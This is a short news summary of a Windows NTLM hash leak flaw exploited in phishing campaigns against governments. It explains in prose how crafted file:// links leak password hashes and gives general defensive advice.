A significant security issue involving Windows has been exploited by cybercriminals targeting governments. This flaw can leak sensitive information, specifically NTLM hashes, which are a form of encoded user passwords, through phishing attacks.
The vulnerability resides in how Windows handles certain file paths when attempting to connect to remote resources. Attackers craft malicious documents or shortcut files containing embedded links that use the file:// protocol, directing the user’s system to an attacker-controlled server on the internet.
When a victim opens one of these files and Windows attempts to access the link, the operating system tries to authenticate itself to the remote server using the NTLM authentication protocol. During this process, the user’s hashed password (the NTLM hash) is automatically sent to the attacker’s server.
While the attacker doesn’t receive the plain text password directly, the NTLM hash is still highly valuable. It can potentially be cracked offline to reveal the actual password, especially if the password is weak. Alternatively, attackers can use the leaked hash in sophisticated “pass-the-hash” attacks to authenticate to other systems or services without needing the original password.
Recent attack campaigns have specifically targeted government entities using these tactics. The malicious documents or links are often disguised with themes related to international affairs, defense, or other topics relevant to the target’s work, increasing the likelihood that a user will open them.
This type of attack highlights the importance of caution when opening files from untrusted sources and the risks associated with automatic authentication protocols like NTLM when connecting to external, potentially hostile networks. Organizations, especially governments, need to be vigilant and implement appropriate security measures to mitigate the risk of NTLM hash leaks through specially crafted phishing lures.
Source: https://www.bleepingcomputer.com/news/security/windows-ntlm-hash-leak-flaw-exploited-in-phishing-attacks-on-governments/
